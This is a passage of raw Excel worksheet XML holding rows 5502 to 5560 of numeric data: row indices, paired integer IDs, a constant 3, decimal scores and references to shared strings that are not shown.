      <c r="E5502">
        <v>0.65590000152587891</v>
      </c>
      <c r="F5502" t="s">
        <v>10120</v>
      </c>
      <c r="G5502" t="s">
        <v>10881</v>
      </c>
      <c r="H5502" t="s">
        <v>10882</v>
      </c>
    </row>
    <row r="5503" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5503" s="1">
        <v>5501</v>
      </c>
      <c r="B5503">
        <v>7664</v>
      </c>
      <c r="C5503">
        <v>7664</v>
      </c>
      <c r="D5503">
        <v>3</v>
      </c>
      <c r="E5503">
        <v>0.86449998617172241</v>
      </c>
      <c r="F5503" t="s">
        <v>10120</v>
      </c>
      <c r="G5503" t="s">
        <v>10883</v>
      </c>
      <c r="H5503" t="s">
        <v>10884</v>
      </c>
    </row>
    <row r="5504" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5504" s="1">
        <v>5502</v>
      </c>
      <c r="B5504">
        <v>6876</v>
      </c>
      <c r="C5504">
        <v>6876</v>
      </c>
      <c r="D5504">
        <v>3</v>
      </c>
      <c r="E5504">
        <v>0.54309999942779541</v>
      </c>
      <c r="F5504" t="s">
        <v>10120</v>
      </c>
      <c r="G5504" t="s">
        <v>10885</v>
      </c>
      <c r="H5504" t="s">
        <v>10886</v>
      </c>
    </row>
    <row r="5505" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5505" s="1">
        <v>5503</v>
      </c>
      <c r="B5505">
        <v>7173</v>
      </c>
      <c r="C5505">
        <v>7173</v>
      </c>
      <c r="D5505">
        <v>3</v>
      </c>
      <c r="E5505">
        <v>0.54089999198913574</v>
      </c>
      <c r="F5505" t="s">
        <v>10120</v>
      </c>
      <c r="G5505" t="s">
        <v>10887</v>
      </c>
      <c r="H5505" t="s">
        <v>10888</v>
      </c>
    </row>
    <row r="5506" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5506" s="1">
        <v>5504</v>
      </c>
      <c r="B5506">
        <v>6546</v>
      </c>
      <c r="C5506">
        <v>6546</v>
      </c>
      <c r="D5506">
        <v>3</v>
      </c>
      <c r="E5506">
        <v>0.70749998092651367</v>
      </c>
      <c r="F5506" t="s">
        <v>10120</v>
      </c>
      <c r="G5506" t="s">
        <v>10889</v>
      </c>
      <c r="H5506" t="s">
        <v>10890</v>
      </c>
    </row>
    <row r="5507" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5507" s="1">
        <v>5505</v>
      </c>
      <c r="B5507">
        <v>7659</v>
      </c>
      <c r="C5507">
        <v>7659</v>
      </c>
      <c r="D5507">
        <v>3</v>
      </c>
      <c r="E5507">
        <v>0.60600000619888306</v>
      </c>
      <c r="F5507" t="s">
        <v>10120</v>
      </c>
      <c r="G5507" t="s">
        <v>10891</v>
      </c>
      <c r="H5507" t="s">
        <v>10892</v>
      </c>
    </row>
    <row r="5508" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5508" s="1">
        <v>5506</v>
      </c>
      <c r="B5508">
        <v>7675</v>
      </c>
      <c r="C5508">
        <v>7675</v>
      </c>
      <c r="D5508">
        <v>3</v>
      </c>
      <c r="E5508">
        <v>0.59609997272491455</v>
      </c>
      <c r="F5508" t="s">
        <v>10120</v>
      </c>
      <c r="G5508" t="s">
        <v>10893</v>
      </c>
      <c r="H5508" t="s">
        <v>10894</v>
      </c>
    </row>
    <row r="5509" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5509" s="1">
        <v>5507</v>
      </c>
      <c r="B5509">
        <v>6661</v>
      </c>
      <c r="C5509">
        <v>6661</v>
      </c>
      <c r="D5509">
        <v>3</v>
      </c>
      <c r="E5509">
        <v>0.56819999217987061</v>
      </c>
      <c r="F5509" t="s">
        <v>10120</v>
      </c>
      <c r="G5509" t="s">
        <v>10895</v>
      </c>
      <c r="H5509" t="s">
        <v>10896</v>
      </c>
    </row>
    <row r="5510" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5510" s="1">
        <v>5508</v>
      </c>
      <c r="B5510">
        <v>7592</v>
      </c>
      <c r="C5510">
        <v>7592</v>
      </c>
      <c r="D5510">
        <v>3</v>
      </c>
      <c r="E5510">
        <v>0.56019997596740723</v>
      </c>
      <c r="F5510" t="s">
        <v>10120</v>
      </c>
      <c r="G5510" t="s">
        <v>10897</v>
      </c>
      <c r="H5510" t="s">
        <v>10898</v>
      </c>
    </row>
    <row r="5511" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5511" s="1">
        <v>5509</v>
      </c>
      <c r="B5511">
        <v>7590</v>
      </c>
      <c r="C5511">
        <v>7590</v>
      </c>
      <c r="D5511">
        <v>3</v>
      </c>
      <c r="E5511">
        <v>0.91130000352859497</v>
      </c>
      <c r="F5511" t="s">
        <v>10120</v>
      </c>
      <c r="G5511" t="s">
        <v>10899</v>
      </c>
      <c r="H5511" t="s">
        <v>10900</v>
      </c>
    </row>
    <row r="5512" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5512" s="1">
        <v>5510</v>
      </c>
      <c r="B5512">
        <v>6841</v>
      </c>
      <c r="C5512">
        <v>6841</v>
      </c>
      <c r="D5512">
        <v>3</v>
      </c>
      <c r="E5512">
        <v>0.99449998140335083</v>
      </c>
      <c r="F5512" t="s">
        <v>10120</v>
      </c>
      <c r="G5512" t="s">
        <v>10901</v>
      </c>
      <c r="H5512" t="s">
        <v>10902</v>
      </c>
    </row>
    <row r="5513" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5513" s="1">
        <v>5511</v>
      </c>
      <c r="B5513">
        <v>7240</v>
      </c>
      <c r="C5513">
        <v>7240</v>
      </c>
      <c r="D5513">
        <v>3</v>
      </c>
      <c r="E5513">
        <v>0.99370002746582031</v>
      </c>
      <c r="F5513" t="s">
        <v>10120</v>
      </c>
      <c r="G5513" t="s">
        <v>10903</v>
      </c>
      <c r="H5513" t="s">
        <v>10904</v>
      </c>
    </row>
    <row r="5514" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5514" s="1">
        <v>5512</v>
      </c>
      <c r="B5514">
        <v>6245</v>
      </c>
      <c r="C5514">
        <v>6245</v>
      </c>
      <c r="D5514">
        <v>3</v>
      </c>
      <c r="E5514">
        <v>0.70599997043609619</v>
      </c>
      <c r="F5514" t="s">
        <v>10120</v>
      </c>
      <c r="G5514" t="s">
        <v>10905</v>
      </c>
      <c r="H5514" t="s">
        <v>10906</v>
      </c>
    </row>
    <row r="5515" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5515" s="1">
        <v>5513</v>
      </c>
      <c r="B5515">
        <v>6836</v>
      </c>
      <c r="C5515">
        <v>6836</v>
      </c>
      <c r="D5515">
        <v>3</v>
      </c>
      <c r="E5515">
        <v>0.68370002508163452</v>
      </c>
      <c r="F5515" t="s">
        <v>10120</v>
      </c>
      <c r="G5515" t="s">
        <v>10907</v>
      </c>
      <c r="H5515" t="s">
        <v>10908</v>
      </c>
    </row>
    <row r="5516" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5516" s="1">
        <v>5514</v>
      </c>
      <c r="B5516">
        <v>7247</v>
      </c>
      <c r="C5516">
        <v>7247</v>
      </c>
      <c r="D5516">
        <v>3</v>
      </c>
      <c r="E5516">
        <v>0.91790002584457397</v>
      </c>
      <c r="F5516" t="s">
        <v>10120</v>
      </c>
      <c r="G5516" t="s">
        <v>10909</v>
      </c>
      <c r="H5516" t="s">
        <v>10910</v>
      </c>
    </row>
    <row r="5517" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5517" s="1">
        <v>5515</v>
      </c>
      <c r="B5517">
        <v>5765</v>
      </c>
      <c r="C5517">
        <v>5765</v>
      </c>
      <c r="D5517">
        <v>3</v>
      </c>
      <c r="E5517">
        <v>0.56269997358322144</v>
      </c>
      <c r="F5517" t="s">
        <v>10120</v>
      </c>
      <c r="G5517" t="s">
        <v>10911</v>
      </c>
      <c r="H5517" t="s">
        <v>10912</v>
      </c>
    </row>
    <row r="5518" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5518" s="1">
        <v>5516</v>
      </c>
      <c r="B5518">
        <v>6835</v>
      </c>
      <c r="C5518">
        <v>6835</v>
      </c>
      <c r="D5518">
        <v>3</v>
      </c>
      <c r="E5518">
        <v>0.82990002632141113</v>
      </c>
      <c r="F5518" t="s">
        <v>10120</v>
      </c>
      <c r="G5518" t="s">
        <v>10913</v>
      </c>
      <c r="H5518" t="s">
        <v>10914</v>
      </c>
    </row>
    <row r="5519" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5519" s="1">
        <v>5517</v>
      </c>
      <c r="B5519">
        <v>6244</v>
      </c>
      <c r="C5519">
        <v>6244</v>
      </c>
      <c r="D5519">
        <v>3</v>
      </c>
      <c r="E5519">
        <v>0.78270000219345093</v>
      </c>
      <c r="F5519" t="s">
        <v>10120</v>
      </c>
      <c r="G5519" t="s">
        <v>10915</v>
      </c>
      <c r="H5519" t="s">
        <v>10916</v>
      </c>
    </row>
    <row r="5520" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5520" s="1">
        <v>5518</v>
      </c>
      <c r="B5520">
        <v>6643</v>
      </c>
      <c r="C5520">
        <v>6643</v>
      </c>
      <c r="D5520">
        <v>3</v>
      </c>
      <c r="E5520">
        <v>0.94129997491836548</v>
      </c>
      <c r="F5520" t="s">
        <v>10120</v>
      </c>
      <c r="G5520" t="s">
        <v>10917</v>
      </c>
      <c r="H5520" t="s">
        <v>10562</v>
      </c>
    </row>
    <row r="5521" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5521" s="1">
        <v>5519</v>
      </c>
      <c r="B5521">
        <v>6834</v>
      </c>
      <c r="C5521">
        <v>6834</v>
      </c>
      <c r="D5521">
        <v>3</v>
      </c>
      <c r="E5521">
        <v>0.44920000433921808</v>
      </c>
      <c r="F5521" t="s">
        <v>10120</v>
      </c>
      <c r="G5521" t="s">
        <v>10918</v>
      </c>
      <c r="H5521" t="s">
        <v>10919</v>
      </c>
    </row>
    <row r="5522" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5522" s="1">
        <v>5520</v>
      </c>
      <c r="B5522">
        <v>5772</v>
      </c>
      <c r="C5522">
        <v>5772</v>
      </c>
      <c r="D5522">
        <v>3</v>
      </c>
      <c r="E5522">
        <v>0.51050001382827759</v>
      </c>
      <c r="F5522" t="s">
        <v>10120</v>
      </c>
      <c r="G5522" t="s">
        <v>10920</v>
      </c>
      <c r="H5522" t="s">
        <v>10921</v>
      </c>
    </row>
    <row r="5523" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5523" s="1">
        <v>5521</v>
      </c>
      <c r="B5523">
        <v>6111</v>
      </c>
      <c r="C5523">
        <v>6111</v>
      </c>
      <c r="D5523">
        <v>3</v>
      </c>
      <c r="E5523">
        <v>0.85610002279281616</v>
      </c>
      <c r="F5523" t="s">
        <v>10120</v>
      </c>
      <c r="G5523" t="s">
        <v>10922</v>
      </c>
      <c r="H5523" t="s">
        <v>10923</v>
      </c>
    </row>
    <row r="5524" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5524" s="1">
        <v>5522</v>
      </c>
      <c r="B5524">
        <v>6830</v>
      </c>
      <c r="C5524">
        <v>6830</v>
      </c>
      <c r="D5524">
        <v>3</v>
      </c>
      <c r="E5524">
        <v>0.5374000072479248</v>
      </c>
      <c r="F5524" t="s">
        <v>10120</v>
      </c>
      <c r="G5524" t="s">
        <v>10924</v>
      </c>
      <c r="H5524" t="s">
        <v>10925</v>
      </c>
    </row>
    <row r="5525" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5525" s="1">
        <v>5523</v>
      </c>
      <c r="B5525">
        <v>7256</v>
      </c>
      <c r="C5525">
        <v>7256</v>
      </c>
      <c r="D5525">
        <v>3</v>
      </c>
      <c r="E5525">
        <v>0.65149998664855957</v>
      </c>
      <c r="F5525" t="s">
        <v>10120</v>
      </c>
      <c r="G5525" t="s">
        <v>10926</v>
      </c>
      <c r="H5525" t="s">
        <v>10927</v>
      </c>
    </row>
    <row r="5526" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5526" s="1">
        <v>5524</v>
      </c>
      <c r="B5526">
        <v>5758</v>
      </c>
      <c r="C5526">
        <v>5758</v>
      </c>
      <c r="D5526">
        <v>3</v>
      </c>
      <c r="E5526">
        <v>0.99879997968673706</v>
      </c>
      <c r="F5526" t="s">
        <v>10120</v>
      </c>
      <c r="G5526" t="s">
        <v>10928</v>
      </c>
      <c r="H5526" t="s">
        <v>10929</v>
      </c>
    </row>
    <row r="5527" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5527" s="1">
        <v>5525</v>
      </c>
      <c r="B5527">
        <v>5778</v>
      </c>
      <c r="C5527">
        <v>5778</v>
      </c>
      <c r="D5527">
        <v>3</v>
      </c>
      <c r="E5527">
        <v>0.993399977684021</v>
      </c>
      <c r="F5527" t="s">
        <v>10120</v>
      </c>
      <c r="G5527" t="s">
        <v>10930</v>
      </c>
      <c r="H5527" t="s">
        <v>10931</v>
      </c>
    </row>
    <row r="5528" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5528" s="1">
        <v>5526</v>
      </c>
      <c r="B5528">
        <v>5781</v>
      </c>
      <c r="C5528">
        <v>5781</v>
      </c>
      <c r="D5528">
        <v>3</v>
      </c>
      <c r="E5528">
        <v>0.64520001411437988</v>
      </c>
      <c r="F5528" t="s">
        <v>10120</v>
      </c>
      <c r="G5528" t="s">
        <v>10932</v>
      </c>
      <c r="H5528" t="s">
        <v>10933</v>
      </c>
    </row>
    <row r="5529" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5529" s="1">
        <v>5527</v>
      </c>
      <c r="B5529">
        <v>6238</v>
      </c>
      <c r="C5529">
        <v>6238</v>
      </c>
      <c r="D5529">
        <v>3</v>
      </c>
      <c r="E5529">
        <v>0.53960001468658447</v>
      </c>
      <c r="F5529" t="s">
        <v>10120</v>
      </c>
      <c r="G5529" t="s">
        <v>10934</v>
      </c>
      <c r="H5529" t="s">
        <v>10935</v>
      </c>
    </row>
    <row r="5530" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5530" s="1">
        <v>5528</v>
      </c>
      <c r="B5530">
        <v>6237</v>
      </c>
      <c r="C5530">
        <v>6237</v>
      </c>
      <c r="D5530">
        <v>3</v>
      </c>
      <c r="E5530">
        <v>0.57260000705718994</v>
      </c>
      <c r="F5530" t="s">
        <v>10120</v>
      </c>
      <c r="G5530" t="s">
        <v>10936</v>
      </c>
      <c r="H5530" t="s">
        <v>10937</v>
      </c>
    </row>
    <row r="5531" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5531" s="1">
        <v>5529</v>
      </c>
      <c r="B5531">
        <v>7261</v>
      </c>
      <c r="C5531">
        <v>7261</v>
      </c>
      <c r="D5531">
        <v>3</v>
      </c>
      <c r="E5531">
        <v>0.99129998683929443</v>
      </c>
      <c r="F5531" t="s">
        <v>10120</v>
      </c>
      <c r="G5531" t="s">
        <v>10938</v>
      </c>
      <c r="H5531" t="s">
        <v>10939</v>
      </c>
    </row>
    <row r="5532" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5532" s="1">
        <v>5530</v>
      </c>
      <c r="B5532">
        <v>6650</v>
      </c>
      <c r="C5532">
        <v>6650</v>
      </c>
      <c r="D5532">
        <v>3</v>
      </c>
      <c r="E5532">
        <v>0.54549998044967651</v>
      </c>
      <c r="F5532" t="s">
        <v>10120</v>
      </c>
      <c r="G5532" t="s">
        <v>10940</v>
      </c>
      <c r="H5532" t="s">
        <v>10941</v>
      </c>
    </row>
    <row r="5533" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5533" s="1">
        <v>5531</v>
      </c>
      <c r="B5533">
        <v>7515</v>
      </c>
      <c r="C5533">
        <v>7515</v>
      </c>
      <c r="D5533">
        <v>3</v>
      </c>
      <c r="E5533">
        <v>0.53710001707077026</v>
      </c>
      <c r="F5533" t="s">
        <v>10120</v>
      </c>
      <c r="G5533" t="s">
        <v>10942</v>
      </c>
      <c r="H5533" t="s">
        <v>10943</v>
      </c>
    </row>
    <row r="5534" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5534" s="1">
        <v>5532</v>
      </c>
      <c r="B5534">
        <v>6651</v>
      </c>
      <c r="C5534">
        <v>6651</v>
      </c>
      <c r="D5534">
        <v>3</v>
      </c>
      <c r="E5534">
        <v>0.95480000972747803</v>
      </c>
      <c r="F5534" t="s">
        <v>10120</v>
      </c>
      <c r="G5534" t="s">
        <v>10944</v>
      </c>
      <c r="H5534" t="s">
        <v>10945</v>
      </c>
    </row>
    <row r="5535" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5535" s="1">
        <v>5533</v>
      </c>
      <c r="B5535">
        <v>6119</v>
      </c>
      <c r="C5535">
        <v>6119</v>
      </c>
      <c r="D5535">
        <v>3</v>
      </c>
      <c r="E5535">
        <v>0.98019999265670776</v>
      </c>
      <c r="F5535" t="s">
        <v>10120</v>
      </c>
      <c r="G5535" t="s">
        <v>10946</v>
      </c>
      <c r="H5535" t="s">
        <v>10947</v>
      </c>
    </row>
    <row r="5536" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5536" s="1">
        <v>5534</v>
      </c>
      <c r="B5536">
        <v>6820</v>
      </c>
      <c r="C5536">
        <v>6820</v>
      </c>
      <c r="D5536">
        <v>3</v>
      </c>
      <c r="E5536">
        <v>0.39660000801086431</v>
      </c>
      <c r="F5536" t="s">
        <v>10120</v>
      </c>
      <c r="G5536" t="s">
        <v>10948</v>
      </c>
      <c r="H5536" t="s">
        <v>10949</v>
      </c>
    </row>
    <row r="5537" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5537" s="1">
        <v>5535</v>
      </c>
      <c r="B5537">
        <v>6819</v>
      </c>
      <c r="C5537">
        <v>6819</v>
      </c>
      <c r="D5537">
        <v>3</v>
      </c>
      <c r="E5537">
        <v>0.69700002670288086</v>
      </c>
      <c r="F5537" t="s">
        <v>10120</v>
      </c>
      <c r="G5537" t="s">
        <v>10950</v>
      </c>
      <c r="H5537" t="s">
        <v>10951</v>
      </c>
    </row>
    <row r="5538" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5538" s="1">
        <v>5536</v>
      </c>
      <c r="B5538">
        <v>6655</v>
      </c>
      <c r="C5538">
        <v>6655</v>
      </c>
      <c r="D5538">
        <v>3</v>
      </c>
      <c r="E5538">
        <v>0.99279999732971191</v>
      </c>
      <c r="F5538" t="s">
        <v>10120</v>
      </c>
      <c r="G5538" t="s">
        <v>10952</v>
      </c>
      <c r="H5538" t="s">
        <v>10953</v>
      </c>
    </row>
    <row r="5539" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5539" s="1">
        <v>5537</v>
      </c>
      <c r="B5539">
        <v>7264</v>
      </c>
      <c r="C5539">
        <v>7264</v>
      </c>
      <c r="D5539">
        <v>3</v>
      </c>
      <c r="E5539">
        <v>0.95480000972747803</v>
      </c>
      <c r="F5539" t="s">
        <v>10120</v>
      </c>
      <c r="G5539" t="s">
        <v>10954</v>
      </c>
      <c r="H5539" t="s">
        <v>10955</v>
      </c>
    </row>
    <row r="5540" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5540" s="1">
        <v>5538</v>
      </c>
      <c r="B5540">
        <v>7272</v>
      </c>
      <c r="C5540">
        <v>7272</v>
      </c>
      <c r="D5540">
        <v>3</v>
      </c>
      <c r="E5540">
        <v>0.84689998626708984</v>
      </c>
      <c r="F5540" t="s">
        <v>10120</v>
      </c>
      <c r="G5540" t="s">
        <v>10956</v>
      </c>
      <c r="H5540" t="s">
        <v>10957</v>
      </c>
    </row>
    <row r="5541" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5541" s="1">
        <v>5539</v>
      </c>
      <c r="B5541">
        <v>7273</v>
      </c>
      <c r="C5541">
        <v>7273</v>
      </c>
      <c r="D5541">
        <v>3</v>
      </c>
      <c r="E5541">
        <v>0.82300001382827759</v>
      </c>
      <c r="F5541" t="s">
        <v>10120</v>
      </c>
      <c r="G5541" t="s">
        <v>10958</v>
      </c>
      <c r="H5541" t="s">
        <v>10959</v>
      </c>
    </row>
    <row r="5542" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5542" s="1">
        <v>5540</v>
      </c>
      <c r="B5542">
        <v>6239</v>
      </c>
      <c r="C5542">
        <v>6239</v>
      </c>
      <c r="D5542">
        <v>3</v>
      </c>
      <c r="E5542">
        <v>0.54979997873306274</v>
      </c>
      <c r="F5542" t="s">
        <v>10120</v>
      </c>
      <c r="G5542" t="s">
        <v>10960</v>
      </c>
      <c r="H5542" t="s">
        <v>10961</v>
      </c>
    </row>
    <row r="5543" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5543" s="1">
        <v>5541</v>
      </c>
      <c r="B5543">
        <v>7207</v>
      </c>
      <c r="C5543">
        <v>7207</v>
      </c>
      <c r="D5543">
        <v>3</v>
      </c>
      <c r="E5543">
        <v>0.98470002412796021</v>
      </c>
      <c r="F5543" t="s">
        <v>10120</v>
      </c>
      <c r="G5543" t="s">
        <v>10962</v>
      </c>
      <c r="H5543" t="s">
        <v>10963</v>
      </c>
    </row>
    <row r="5544" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5544" s="1">
        <v>5542</v>
      </c>
      <c r="B5544">
        <v>7238</v>
      </c>
      <c r="C5544">
        <v>7238</v>
      </c>
      <c r="D5544">
        <v>3</v>
      </c>
      <c r="E5544">
        <v>0.59759998321533203</v>
      </c>
      <c r="F5544" t="s">
        <v>10120</v>
      </c>
      <c r="G5544" t="s">
        <v>10964</v>
      </c>
      <c r="H5544" t="s">
        <v>10965</v>
      </c>
    </row>
    <row r="5545" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5545" s="1">
        <v>5543</v>
      </c>
      <c r="B5545">
        <v>6843</v>
      </c>
      <c r="C5545">
        <v>6843</v>
      </c>
      <c r="D5545">
        <v>3</v>
      </c>
      <c r="E5545">
        <v>0.98570001125335693</v>
      </c>
      <c r="F5545" t="s">
        <v>10120</v>
      </c>
      <c r="G5545" t="s">
        <v>10966</v>
      </c>
      <c r="H5545" t="s">
        <v>10967</v>
      </c>
    </row>
    <row r="5546" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5546" s="1">
        <v>5544</v>
      </c>
      <c r="B5546">
        <v>6089</v>
      </c>
      <c r="C5546">
        <v>6089</v>
      </c>
      <c r="D5546">
        <v>3</v>
      </c>
      <c r="E5546">
        <v>0.50669997930526733</v>
      </c>
      <c r="F5546" t="s">
        <v>10120</v>
      </c>
      <c r="G5546" t="s">
        <v>10968</v>
      </c>
      <c r="H5546" t="s">
        <v>10969</v>
      </c>
    </row>
    <row r="5547" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5547" s="1">
        <v>5545</v>
      </c>
      <c r="B5547">
        <v>6578</v>
      </c>
      <c r="C5547">
        <v>6578</v>
      </c>
      <c r="D5547">
        <v>3</v>
      </c>
      <c r="E5547">
        <v>0.35859999060630798</v>
      </c>
      <c r="F5547" t="s">
        <v>10120</v>
      </c>
      <c r="G5547" t="s">
        <v>10970</v>
      </c>
      <c r="H5547" t="s">
        <v>10971</v>
      </c>
    </row>
    <row r="5548" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5548" s="1">
        <v>5546</v>
      </c>
      <c r="B5548">
        <v>7580</v>
      </c>
      <c r="C5548">
        <v>7580</v>
      </c>
      <c r="D5548">
        <v>3</v>
      </c>
      <c r="E5548">
        <v>0.79720002412796021</v>
      </c>
      <c r="F5548" t="s">
        <v>10120</v>
      </c>
      <c r="G5548" t="s">
        <v>10972</v>
      </c>
      <c r="H5548" t="s">
        <v>10973</v>
      </c>
    </row>
    <row r="5549" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5549" s="1">
        <v>5547</v>
      </c>
      <c r="B5549">
        <v>7572</v>
      </c>
      <c r="C5549">
        <v>7572</v>
      </c>
      <c r="D5549">
        <v>3</v>
      </c>
      <c r="E5549">
        <v>0.80239999294281006</v>
      </c>
      <c r="F5549" t="s">
        <v>10120</v>
      </c>
      <c r="G5549" t="s">
        <v>10974</v>
      </c>
      <c r="H5549" t="s">
        <v>10975</v>
      </c>
    </row>
    <row r="5550" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5550" s="1">
        <v>5548</v>
      </c>
      <c r="B5550">
        <v>7570</v>
      </c>
      <c r="C5550">
        <v>7570</v>
      </c>
      <c r="D5550">
        <v>3</v>
      </c>
      <c r="E5550">
        <v>0.68349999189376831</v>
      </c>
      <c r="F5550" t="s">
        <v>10120</v>
      </c>
      <c r="G5550" t="s">
        <v>10976</v>
      </c>
      <c r="H5550" t="s">
        <v>10977</v>
      </c>
    </row>
    <row r="5551" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5551" s="1">
        <v>5549</v>
      </c>
      <c r="B5551">
        <v>6584</v>
      </c>
      <c r="C5551">
        <v>6584</v>
      </c>
      <c r="D5551">
        <v>3</v>
      </c>
      <c r="E5551">
        <v>0.56660002470016479</v>
      </c>
      <c r="F5551" t="s">
        <v>10120</v>
      </c>
      <c r="G5551" t="s">
        <v>10978</v>
      </c>
      <c r="H5551" t="s">
        <v>10979</v>
      </c>
    </row>
    <row r="5552" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5552" s="1">
        <v>5550</v>
      </c>
      <c r="B5552">
        <v>7566</v>
      </c>
      <c r="C5552">
        <v>7566</v>
      </c>
      <c r="D5552">
        <v>3</v>
      </c>
      <c r="E5552">
        <v>0.98629999160766602</v>
      </c>
      <c r="F5552" t="s">
        <v>10120</v>
      </c>
      <c r="G5552" t="s">
        <v>10980</v>
      </c>
      <c r="H5552" t="s">
        <v>10981</v>
      </c>
    </row>
    <row r="5553" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5553" s="1">
        <v>5551</v>
      </c>
      <c r="B5553">
        <v>6589</v>
      </c>
      <c r="C5553">
        <v>6589</v>
      </c>
      <c r="D5553">
        <v>3</v>
      </c>
      <c r="E5553">
        <v>0.77240002155303955</v>
      </c>
      <c r="F5553" t="s">
        <v>10120</v>
      </c>
      <c r="G5553" t="s">
        <v>10982</v>
      </c>
      <c r="H5553" t="s">
        <v>10983</v>
      </c>
    </row>
    <row r="5554" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5554" s="1">
        <v>5552</v>
      </c>
      <c r="B5554">
        <v>7563</v>
      </c>
      <c r="C5554">
        <v>7563</v>
      </c>
      <c r="D5554">
        <v>3</v>
      </c>
      <c r="E5554">
        <v>0.77069997787475586</v>
      </c>
      <c r="F5554" t="s">
        <v>10120</v>
      </c>
      <c r="G5554" t="s">
        <v>10984</v>
      </c>
      <c r="H5554" t="s">
        <v>10985</v>
      </c>
    </row>
    <row r="5555" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5555" s="1">
        <v>5553</v>
      </c>
      <c r="B5555">
        <v>6851</v>
      </c>
      <c r="C5555">
        <v>6851</v>
      </c>
      <c r="D5555">
        <v>3</v>
      </c>
      <c r="E5555">
        <v>0.5471000075340271</v>
      </c>
      <c r="F5555" t="s">
        <v>10120</v>
      </c>
      <c r="G5555" t="s">
        <v>10986</v>
      </c>
      <c r="H5555" t="s">
        <v>10987</v>
      </c>
    </row>
    <row r="5556" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5556" s="1">
        <v>5554</v>
      </c>
      <c r="B5556">
        <v>7557</v>
      </c>
      <c r="C5556">
        <v>7557</v>
      </c>
      <c r="D5556">
        <v>3</v>
      </c>
      <c r="E5556">
        <v>0.75379997491836548</v>
      </c>
      <c r="F5556" t="s">
        <v>10120</v>
      </c>
      <c r="G5556" t="s">
        <v>10988</v>
      </c>
      <c r="H5556" t="s">
        <v>10989</v>
      </c>
    </row>
    <row r="5557" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5557" s="1">
        <v>5555</v>
      </c>
      <c r="B5557">
        <v>6105</v>
      </c>
      <c r="C5557">
        <v>6105</v>
      </c>
      <c r="D5557">
        <v>3</v>
      </c>
      <c r="E5557">
        <v>0.83689999580383301</v>
      </c>
      <c r="F5557" t="s">
        <v>10120</v>
      </c>
      <c r="G5557" t="s">
        <v>10990</v>
      </c>
      <c r="H5557" t="s">
        <v>10991</v>
      </c>
    </row>
    <row r="5558" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5558" s="1">
        <v>5556</v>
      </c>
      <c r="B5558">
        <v>7233</v>
      </c>
      <c r="C5558">
        <v>7233</v>
      </c>
      <c r="D5558">
        <v>3</v>
      </c>
      <c r="E5558">
        <v>0.81220000982284546</v>
      </c>
      <c r="F5558" t="s">
        <v>10120</v>
      </c>
      <c r="G5558" t="s">
        <v>10992</v>
      </c>
      <c r="H5558" t="s">
        <v>10993</v>
      </c>
    </row>
    <row r="5559" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5559" s="1">
        <v>5557</v>
      </c>
      <c r="B5559">
        <v>6598</v>
      </c>
      <c r="C5559">
        <v>6598</v>
      </c>
      <c r="D5559">
        <v>3</v>
      </c>
      <c r="E5559">
        <v>0.99489998817443848</v>
      </c>
      <c r="F5559" t="s">
        <v>10120</v>
      </c>
      <c r="G5559" t="s">
        <v>10994</v>
      </c>
      <c r="H5559" t="s">
        <v>10995</v>
      </c>
    </row>
    <row r="5560" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5560" s="1">
        <v>5558</v>
      </c>
      <c r="B5560">
        <v>6630</v>
      </c>
      <c r="C5560">
        <v>6630</v>
      </c>
      <c r="D5560">
        <v>3</v>
      </c>
      <c r="E5560">
        <v>0.98669999837875366</v>
      </c>
      <c r="F5560" t="s">
        <v>10120</v>
      </c>
      <c r="G5560" t="s">
        <v>10996</v>
      </c>
